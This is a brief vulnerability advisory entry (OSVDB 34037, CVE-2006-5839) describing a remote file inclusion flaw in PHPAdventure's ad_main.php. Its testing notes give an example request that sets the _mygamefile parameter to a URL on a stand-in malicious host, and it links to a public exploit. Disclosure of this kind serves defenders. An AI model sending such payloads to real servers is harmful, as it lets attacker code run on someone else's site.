PHPAdventure ad_main.php _mygamefile Variable Remote File Inclusion

2006-11-07T22:16:05
ID OSVDB:34037
Type osvdb
Reporter OSVDB
Modified 2006-11-07T22:16:05

Description

Manual Testing Notes

/ad_main.php?_mygamefile=http://evilcode.txt?

References:

ISS X-Force ID: 30091 Generic Exploit URL: http://milw0rm.com/exploits/2736 CVE-2006-5839